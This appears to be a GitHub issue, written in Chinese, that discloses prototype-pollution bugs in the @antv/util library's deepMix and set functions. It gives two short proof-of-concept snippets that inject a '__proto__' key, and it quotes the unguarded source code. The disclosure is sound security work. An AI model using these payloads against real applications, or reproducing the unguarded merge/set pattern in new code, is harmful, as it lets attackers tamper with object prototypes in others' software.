潜在的原型链污染漏洞

复现代码1：
```javascript
let deepMix = require("@antv/util").deepMix;

let BAD_JSON = JSON.parse('{"__proto__":{"test":123}}');

let obj = {};
deepMix(obj, BAD_JSON);

console.log({}.test); // 123
```

问题代码：
https://github.com/antvis/util/blob/c499a30265ccf6099fc6e23d123f04b547eeaf5d/src/lodash/deep-mix.ts#L42-L47


复现代码2：
```javascript
let set = require("@antv/util").set;

let obj = {};
set(obj, "__proto__.test", 123);

console.log({}.test); // 123
```

问题代码：
https://github.com/antvis/util/blob/c499a30265ccf6099fc6e23d123f04b547eeaf5d/src/lodash/set.ts#L5-L29

	const deepMix = function (rst: any, ...args: any[]) {
	for (let i = 0; i < args.length; i += 1) {
	_deepMix(rst, args[i]);
	}
	return rst;
	};

	/**
	* https://github.com/developit/dlv/blob/master/index.js
	* @param obj
	* @param path
	* @param value
	*/
	export default (obj: any, path: string \| any[], value: any): any => {
	let o = obj;

	const keyArr = isString(path) ? path.split('.') : path;

	keyArr.forEach((key: string \| number, idx: number) => {
	// 不是最后一个
	if (idx < keyArr.length - 1) {
	if (!isObject(o[key])) {
	o[key] = isNumber(keyArr[idx + 1]) ? [] : {};
	}
	o = o[key];
	} else {
	o[key] = value;
	}
	});

	return obj;
	};

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

潜在的原型链污染漏洞 #114

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

潜在的原型链污染漏洞 #114

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions